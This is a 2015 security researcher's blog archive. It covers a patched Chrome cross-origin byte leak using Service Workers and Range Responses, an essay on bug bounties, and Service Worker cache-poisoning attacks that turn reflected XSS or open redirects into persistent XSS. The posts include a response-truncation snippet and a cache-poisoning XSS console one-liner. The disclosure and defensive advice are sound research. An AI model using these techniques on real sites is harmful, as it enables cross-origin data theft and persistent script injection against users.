Sunday, October 04, 2015

Range Responses: Mix, Match & Leak

Hey!

The videos from AppSec 2015 are now online, and the Service Workers talk is too. Anyway, this post is about another of the slides in the presentation about Range Requests / Responses (or.. more commonly known as Byte Serving) and Service Workers.

As things go, turns out you can read content cross-domain with this attack, and this post explains how that works. Range Responses are essentially normal HTTP responses that only contain a subset of the body. It works like this:

It's relatively straight forward! With service workers in the mix, you can do similar things:

And, I mean, what happens there is that the Service Worker intercepts the first request and gives you LoL instead of Foo. Note that this works cross-origin since Service Workers apply to the page that created the request (so, say, if evil.com embeds a video from apple.com, the service worker from evil.com will be able to intercept the request to apple.com). One thing to note about this, is that the Service Worker actually controls the total length of the response. What this means, is that even if the actual response is 2MB if the Service Worker says it's 100KB, the browser will believe the Service Worker (it seems browsers respect the first response size they see, in this case, the one from the service worker).

This all started when I noticed is that you could split a response in two, one generated by a Service Worker and one that isn't. To clarify, the code below, intercepts a request to a song. What's interesting about it, is that it actually serves part of the response from the Service Worker (the first 3 bytes).

Another interesting aspect, is that the size of the file is truncated to 5,000 bytes. This is because the browser remembers the first provided length.

The code for this (before the bug was patched by Chrome) was:
  // Basic truncation example
  if (url.pathname == '/wikipedia/ru/c/c6/Glorious.ogg') {
    if (e.request.headers.get('range') == 'bytes=0-') {
      console.log('responding with fake response');
      e.respondWith(
        new Response(
          'Ogg', {status: 206, headers: {'content-range': 'bytes 0-3/5000'}}))
    } else {
      console.log('ignoring request');
    }
    return;
  }
So, to reiterate, the request is responding with "Ogg" as the first three bytes, and truncating the response to 5,000 bytes. Alright, so what can you do with this? Essentially, you can partially control audio/video responses, but it's unlikely this can cause a lot of problems, right? I mean, so what you can make a bad song last 1 second rather than 30 seconds?.

To exploit this we need to take a step back and see the data as the video decoder sees it. In essence, the video decoder doesn't actually know anything about range responses, it just sees a stream of bytes. Imagine if the video that the decoder sees had the following format:

  • [Bytes 0-100] Video Header
  • [Bytes 101-200] Video Frame
  • [Bytes 201-202] Checksum of Video Frame
But the content in ORANGE comes from the Service Worker, and the content in RED comes from the target/victim site. A clever attacker would send 65 thousand different video frames until one of them doesn't error out, and then we would know what is the value of the bytes 201 and 202 of the target/victim site.

I searched for a while for a video format or container with this property, but unfortunately didn't find one. To be honest, I didn't look too hard as it's really confusing to read these specs but essentially after like 1 hour of searching and scratching my head I gave up, and decided to do some fuzzing instead.

The fuzzing was essentially like this:
  1. Get a sample of video and audio files.
  2. Load them in audio/video tags.
  3. Listen to all events.
  4. Fetch the video from length 0-X, and claim a length of X+1.
  5. Have the last byte be 0xFF.
  6. Repeat
And whenever it found a difference between the response on 0-X and 0-X+1, that means there's an info leak! I did this and in a few hours and after wasting my time looking at MP3 files (it seems they just give out approximate duration at random) I found a candidate. Turns out it wasn't a checksum, it was something even better! :)

So, I found that a specific Encrypted WebM video errors out when truncated to 306 bytes if the last byte is greater than 0x29, but triggers an onencrypted event when it's less than that. This seems super weird, but that's a good start, I guess. I created a proof of concept, where I tested whether the byte in a cross-origin resource is less than 0x29 or not. If you have a vulnerable browser (Chrome <=44) you can see this proof of concept here:
If you compare both pages you will see that one says PASS and the other says FAIL. The reason is because in the position 306 of the robots.txt of www.bing.com there is a new line, while in the position 306 of www.yahoo.com there is a letter.

Good enough you might think! I can now know whether position 306 is a space or not. Not really very serious, but serious enough to be cool, right? No. Of course not.

First of all, I wanted to know how to make this apply to any offset, not just 306. It was easy enough to just create another EBML object of arbitrary size. Then that's about it! You just make the size longer and longer. So first problem solved. Now you can change the byte offset you are testing.

But still, the only thing I can know is whether the character at that position is a space or not. So, I started looking into why that errored out, and turns out it was because the dimensions of the video were too big. There is a limit on the pixel size of a video because of some reason, and the byte in position 306 happened to be the video height dimensions that was longer than it was valid.

So, well.. now that we know that, can we learn the exact value? What if we tried to load the video 256 times, each time with a different width value, for which it would overflow if the size is too big. The formula the video decoder was using for calculating the maximum dimensions is:


So! Seems easy enough then. I get the minimum value on which it errors out, and calculate it's complement to INT_MAX/8 (minus 128), and that's the value of the byte at that position. Since this is a "less than" comparison you can solve this minimum value with a simple binary search.

And that's it. I made a slightly nicer exploit here, although the code is quite unreadable. The PoC will try to steal byte by byte of the robots.txt of www.bing.com.

Severity-wise fortunately, this isn't an end-of-the-world situation. Range Responses (or.. Byte Serving) don't actually work on any dynamically generated content I found online. This is most likely because dynamic generated content isn't static, so requesting it in chunks doesn't make sense.

And that's it for today! It's worth noting that it's possible this isn't specific with Service Workers as it seems that HTTP redirects have a similar effect (you make two requests to a same-origin video, the first time you respond with a truncated video, the second time you redirect to another domain).

Specially since Service Workers aren't as widely supported yet. Feel free to write a PoC for that (you can use this for inspiration). And once the bug is public, you can follow along this bug discovery here and the spec discussion here.

The bug is fixed in Chrome, but I didn't test other browsers as thoroughly for lack of time (and this blog post is already delayed for like 3 months because of Chrome, so didn't want to embargo this further). If you do find a way to exploit this elsewhere, please let me know the results, and happy to help if you get stuck.

Have a nice day!

Tuesday, September 22, 2015

Not about the money

This applies to all posts in this blog, but just as a reminder. What I say here doesn't necessarily have to reflect the opinions of my employer. This is just my personal view on the subject.

I want to briefly discuss bug bounties, security rewards, and security research in general. Mostly because in the last five years a lot has changed, there are many new players. Some giving rewards, and some receiving them.

Background

As a brief introduction, I'll preface this by explaining why I (personally) used to (and continue to) report bugs back when there was no money involved, and then try to go from there to where we are today.

Before there were bug bounties, I (and many others) used to report bugs for free to companies, and we usually got "credit" as the highest reward, but I actually didn't do it for the credit (it was a nice prize, but that's it).

The reason I did it was because I am a user and I (selfishly) tried to make the products I used, better and safer for me. Another reason was that the challenge of finding bugs in "big" companies was like solving an unsolvable puzzle. Like the last level of a wargame that the developers thought no one could solve.

Rewards

With that said, I was super excited when companies started paying for bugs (mostly, because I had no money), but also because it felt "right". For a couple reasons but mostly because money is free for companies and it is a good way to materialize appreciation.

Rewards are a great way to say "thank you for your time and effort". It's like a gift, that just happens to come in US Dollars. Before money, T-Shirts were the equivalent, and sometimes even handwritten notes that said thank you.

It goes without saying that respect was also a big factor for me. Speedy responses, a human touch, and honest feedback always mattered a lot to me, and gave me confidence back when I was starting. Specially when I learnt something new.

Appreciation

It is my view, that we shouldn't call them "Bug Bounty Programs", I would like them to be called "Bug Hunter Appreciation Programs". I don't like the term "Bug Bounty", because bounty sounds a lot like it's money up for grabs, when the attitude is that of a gift, or a "thank you, you are awesome".

In other words, rewards are gifts, not transactions.

Rewards, in my view, are supposed to show appreciation, and they are not meant to be a price tag. There are many ways to show appreciation, and it can go from the simple "thank you!" in an email, or  in public all the way to a job offer or a contract. In fact, I got my first job this way.

For companies, I actually think that the main value reward programs provide isn't the "potential cyber-inteligence capabilities of continuous pentesting" or anything ridiculous like that, but something a lot more simple. To build and maintain a community around you, and you do that by building relationships.

Users

Think about it this way. These bug hunters are also users of the products they found bugs on, and then these users go and make these products better for everyone else. And in return, the companies "thank" these users for their help for making it better not just for them, but for everyone.

These users also, eventually, become more familiar with these products than the developers themselves, and that is without even having access to the source code. These users will know about all the quirks of the product, and will know how to use them to their advantage. These are not power users, they are a super-powered version of a user.

And reward programs were built for these users, for those that did it back when money wasn't involved. They are there as a sign of appreciation and a way to recognize the value of the research.

Recognition

The traditional way of saying "thanks" for vulnerability research has been recognition. For recognition to be valuable it doesn't necessarily have to come from the affected product or company, but rather it could come from the press, or from others in the community. Having your bug be highlighted as a Pwnie is nice, for example, even more so than a security bulletin by the affected company.

More recently, it's more common to have money be used to supplement recognition (and some companies apparently also use it to replace recognition, requiring the researcher not to talk about the bug, or talk bad about the affected company). It's quite interesting this isn't usually highlighted, but I think it's quite important. For many of us, recognition is more important than money, if any, because we depend so much on working and learning from others, that silence diminishes the value of our work.

Money

One question that I don't see asked often enough is: How to decide reward amounts?

First of all, let's consider they are gifts, not price tags. If you could come up with a gift that feels adequate as a gift for a user that is going out of they way to make (your) product better for everyone, what would it be?

It might very well be that it isn't money! Maybe it is free licenses for your product, or invitations to parties or conferences. Maybe it's just an invite to an unreleased product. Doing this at scale, though, might prove difficult.. so if you have to use money, maybe what is worth to go out one night for dinner and movies, or so. You can take that and then go from there to calculate higher rewards.

This is one of the reasons I don't really like "micro rewards" for $10 USD or so. Because while they are well-intentioned, they also convey the wrong message. I do realize they are valuable in bulk (products that give out these micro rewards usually have a lot of low hanging fruit), but rewarding individual bugs at low rewards also gives the feeling you are just being used for crowd sourcing, or as a "Bulk Bounty".

In any case, I appreciate this is mostly the wrapping of the message being delivered, but I think the message matters when you are dealing with money. The difference between you being "the user" and you being "the product" changes the perception and relationship between companies and users.

Trust

Two of the most important aspects of any relationship, are trust and respect. Coming back to the point earlier about money, I really like to see how "no reward" responses are written in different companies, because they show how much of a feeling of a transaction, and how much of a feeling of appreciation there is.

Maybe somewhat counter-intuitive for some is that trust goes both ways. Trusting bug hunters makes response teams more trustworthy, and vice-versa. Accepting the possibility that you are wrong and made a mistake reporting a bug (even if the bug seems to be valid, maybe you are wrong!) and the other way around, handling a bug (even if the bug seems to be invalid, maybe it is valid!). This is particularly important when communicating disagreements.

In any case, whatever the decision was, just saying "thanks" goes a long way. Even the slightest hint of disrespect can ruin an otherwise strong relationship, specially in a medium as cold as email. What is even better is to be transparent about the rationale for the "no reward" response. This is difficult, logistically, as "no reward" decisions are the bulk of the responses sent by any program, but doing a good job here goes a long way to foster trust.

Help

At the end of the day, a vulnerability report in a product is simply an attempt in helping the product. Such help sometimes is not welcome by some ("best bug is unknown bug") and some times it's not helpful at all (invalid reports, for example), but in any case, it's help. Accepting help when you need it, saying thanks when you don't, and then helping back when you can is essentially team work.

Another aspect is that sometimes you can reciprocate a vulnerability report with help. If a bug hunter seems lost or started off the wrong way, a little nudging and education can go a very long way. In fact, this is one of the most amazing realizations I've had in these past 4 years. The most insistent researchers that send the most reports, are also the most enthusiastic and eager to learn.

Investing some time helping via coaching and education rather than just depending on automated advice or scoring and rankings helps to create and grow a community. These bug hunters want to help, why don't you help them? It needs time and patience, but it will be worth it. Some small amount of personal feedback is all that is needed. You can't automate relationships.

Challenges

Finally, something amazing happened. Some Bug Hunters started getting a reasonable amount of money out of this! While these programs were originally created to be more like winning the lottery, some very talented individuals actually became really good at this.

The consequences are actually quite interesting. If you can have a sustainable life off white hat vulnerability research, you also become more dependent on these relationships than ever, and trust becomes a critical aspect for sustaining this relationship in the long term. Transparency and clarity on decisions and consistency suddenly become not just best practices but guiding principles.

Another interesting challenge is that of long term planning. It might make you more efficient at finding bugs to do so every day, but companies really want to eventually make finding these bugs harder and harder. This also creates some uncertainty about your future, and how to sustain this for a long time.

Then there are other challenges. These programs are quite unique and explaining them can be challenging for their legal and fiscal implications. I still remember when I got my first reward from Mozilla it was a bit awkward explaining to my bank why I had money being sent from abroad. I can just imagine having to do this every couple weeks, would be crazy.

Conclusions

It's not about the money. It is about working together and keeping us all safe.
  • If you feel your reward wasn't as high as you expected, maybe your bug's impact wasn't understood correctly, and that also might mean it was fixed incorrectly. Make sure there are no misunderstandings.
  • If there are no misunderstandings, then take the reward as what it is - a gift. It's not a bill for your time, it's not a price for your silence, it's not a bid for your bug's market price. It's just a thank you.
  • If you don't get credit for the bug you found, but you think it is a cool bug, then get credit for yourself! Blog about it, and share it with your peers. Make sure the bug is fixed (or at least give a heads up before making it public, if it's not gonna be fixed quickly).
Bug hunters are also users. Delight them with excellent customer service. Money is just a way to say thank you, it isn't an excuse to have them do work.
  • Appreciation, Recognition and Transparency (ART) are the pillars of a well ran security response program.
  • If you find yourself buried in low quality reports, invest some time to help them. Ignoring the problem won't make it go away.
  • Invest as much time as possible knowing about your community. Meet them face to face, invite them for dinner! Bug hunters are and will always be your most valuable users (including those that just started learning).


Wednesday, May 27, 2015

[Service Workers] Secure Open Redirect becomes XSS Demo

This is the shortest delay between blog posts I've had in a while, but I figured that since my  last post had some confusing stuff, it might make sense to add a short demo. The demo application has three things that enable the attack:

  1. An open redirect. Available at /cgi-bin/redirect?continue=.
  2. A Cache Service Worker. Available at /sw.js.
  3. A page that embeds images via <img crossorigin="anonymous" src="" />.
And the attacker's site has one thing:
  1. A CORS enabled attack page. Available at /cgi-bin/attack.
Let's do the attack then! For it to work we need two things to happen:
  • The service worker must be installed.
  • A request to our attack page must be cached with mode=cors.
Our index.html page will do both of those things for us.
Poison Cache

Image URL:



When you click submit above the following things will happen:
  1. A service worker will be installed for the whole origin.
  2. An image tag pointing to the open redirect will be created.
  3. The service worker will cache the request with the CORS response of the attacker.
If all went well, the page above should be "poisoned", and forever (or until the SW updates it's cache) you will get the XSS payload. Try it (note that you must have first "poisoned" the response above, if you click the button below here before poisoning the cache first, you will ruin the demo for ever since an opaque response will get cached ;):
If the demo doesn't work for you, that probably means you navigated to the attack page before caching the CORS response. If that's the case, to clear the cache.

Note you need Chrome 43 or later for this to work (or a nightly version of Firefox with the flags flipped). Hope this clarifies things a bit!

Monday, May 25, 2015

[Service Workers] New APIs = New Vulns = Fun++


Just came back from another great HackPra Allstars, this time in the beautiful city of Amsterdam. Mario was kind enough to invite me to ramble about random security stuff I had in mind (and this year it was Service Workers). The presentation went OK and it was super fun to meet up with so many people, and watch all those great presentations.

In any case, I promised to write a blog post to repeat the presentation but in a written form, however I was hoping to watch the video to see what mistakes I might have made and correct them in the blog post, and the video is not online yet. Anyway, so, until then, today this post is about something that wasn't mentioned in the talk.

This is about what type of vulnerabilities applications using Service Workers are likely to create. To start, I just want to say that I totally love Service Workers! It's APIs are easy to use and understand and the debugging tools in Chrome are beautiful and well done (very important since tools such as Burp or TamperChrome wouldn't work as well with offline apps as no requests are actually done.) You can clearly see that a lot of people have thought a lot about this problem, and there is some serious effort around making offline application development possible.

The reason this blog post content wasn't part of the presentation is because I thought it already had too much content, but if you don't know how Service Workers work, you might want to see the first section of the slides (as it's an introduction) or you can read this article or this video.

Anyway, so back to biz.. Given that there aren't many "real" web applications using Service Workers, I'll be using the service-worker samples from the w3c-webmob, but as soon as you start finding real service worker usage take a look and let me know if you find these problems too!

There are two main categories of potential problems I can see:
  1. Response and Caching Issues
  2. Web JavaScript Web Development

Response and Caching Issues

The first "category" or "family" of problems are response and caching issues. These are issues that are present because of the way responses are likely to be handled by applications.

Forever XSS

The first problem, that is probably kind-of bad, is the possibility of making a reflected XSS into a persistent XSS. We've already seen this type of problems based on APIs like localStorage before, but what makes this difference is that the Cache API is actually designed to do exactly that!

When the site is about to request a page from the web, the service worker is consulted first. The service worker at this point can decide to respond with a cache response (it's logic is totally delegated to the Service Worker). One of the main use-cases for service workers is to serve a cached-up copy of the request. This cache is programmatic and totally up-to the application to decide how to handle it.

One coding pattern for Service Workers is to respond with whatever is in the cache, if available or, to make a request if not (and cache the response). In other words, in those cases, no request is ever made to the server if the request matches a cached response. Since this Cache database is accessible to any JS code running in the same origin, an attacker can pollute the Cache with whatever it wants, and let the client serve the malicious XSS for ever!

If you want to try this out, go here:

Then fake an XSS by typing this to the console:
caches.open('prefetch-cache-v1').then(function(cache){cache.put(new Request('index.html', {mode: 'no-cors'}), new Response('\x3cscript>alert(1)\x3c/script>', {headers: {'content-type': 'text/html'}}))})

Now whenever you visit that page you will see an alert instead! You can use Control+Shift+R to undo it, but when you visit the page again, the XSS will come back. It's actually quite difficult to get rid of this XSS. You have to manually delete the cache :(.

This is likely to be an anti-pattern we'll see in new Service-Workers enabled applications often. To prevent this, one of the ideas from Jake Archibald is to simply check the "url" property of the response. If the URL is not the same as the request, then simply not use it, and discard it from the cache. This idea is quite important actually, and I'll explain why below.

When Secure Open Redirects become XSS

A couple years ago in a presentation with thornmaker we explained how open redirects can result in XSS and information leaks, and they were mostly limited to things such as redirecting to insecure protocols (like javascript: or data:). Service Workers, however, and in specific some of the ways that the Cache API is likely to be used, introduce yet another possibility, and one that is quite bad too.

As explained before, the way people seem to be coding over the Cache API is by reading the Request, fetching it, and then caching the Response. This is tricky, because when a service worker renders a response, it renders it from the same origin it was loaded from.

In other words.. let's say you have a website that has an open redirect..
  • https://www.example.com/logout?next=https://www.othersite.com/
And you have a service worker like this one:
  • https://googlechrome.github.io/samples/service-worker/read-through-caching/service-worker.js
What that service worker does, as the previous one, is simply cache all requests that go through by refetching and the service worker will cache the response from evilwebsite.com for the other request!

That means that next time the user goes to:
  • https://www.example.com/logout?next=https://www.evilwebsite.com
The request will be cached and instead of getting a 302 redirect, they will get the contents of evilwebsite.com.

Note that for this to work, evilwebsite.com must include Access-Control-Allow-Origin: * as a response header, as otherwise the request won't be accepted. And you need to make the request be cors enabled (with a cross origin image, or embed request for example).

This means that an open redirect can be converted to a persistent XSS and is another reason why checking the url property of the Response is so important before rendering it (both from Cache and on code like event.respondWith(fetch(event.request))). Because even if you have never had an XSS, you can introduce one by accident. If I had to guess, almost all usages of Service Workers will be vulnerable to one or another variation of these types of attacks if they don't implement the response.url check.

There's a bunch of other interesting things you can do with Service Workers and Requests / Responses, mentioned in the talk and that I'll try to blog about later. For now though, let's change subject.

Web JavaScript Web Development

This will sound weird to some, but the JavaScript APIs in the browser don't actually include any good web APIs for building responses. What this means is that because Service Workers will now be kind-of like Web Servers, but are being put there without having any APIs for secure web development, then it's likely they will introduce a bunch of cool bugs.

JavaScript Web APIs aren't Web Service APIs


For starters, the default concerns are things that affect existing JS-based server applications (like Node.js). Things from RegExp bugs because the JS APIs aren't secure by default to things like the JSON API lack of encoding.

But another more interesting problem is that the lack of templating APIs in Service Workers means people will write code like this which of course means it's gonna be full of XSS. And while you could import a templating library with strict contextual auto-escaping, the lack of a default library means people are just likely to use insecure alternatives or just default to string concatenation (note things like angular and handlebars won't work here, because they work at the DOM level and the Service Workers don't have access to the DOM as they run way before the DOM is created).

It's also worth noting that thanks to the asynchronous nature of Service Workers (event-driven and promise-based) mixed with developers that aren't used to this, is extremely likely to introduce concurrency vulnerabilities in JS if people abuse the global scope, which while isn't the case today, is very likely to be the case soon.

Cross Site Request Forgery


Another concern is that CSRF protection will have to behave differently for Service Workers. In specific, Service Workers will most likely have to depend more on referrer/origin based checks. This isn't bad in and off itself, but mixing this with online web applications will most likely pose a challenge to web applications. Funnily, none of the demos I found online have CSRF protection, which remarks the problem, but also makes it hard for me to give you examples on why it's gonna be hard.

To give a specific example, if a web application is meant to work while offline, how would such application keep track of CSRF tokens? Once the user comes online, it's possible the CSRF tokens won't be valid anymore, and the offline application will have to handle that gracefully. While handling the fallback correctly is possible by simply doing different checks depending on the online state of the application, it's likely more people will get it wrong than right.

Conclusion

I'm really excited to see what type of web applications are developed with Service Workers, and also about what type of vulnerabilities they introduce :). It's too early to know exactly, but some anti-patterns are clearly starting to emerge as a result of the API design, or of the existing mental models on developers' heads.

Another thing I wanted to mention, before closing up is that I'll start experimenting writing some of the defense security tools I mentioned in the talk, if you want to help out as well, please let me know!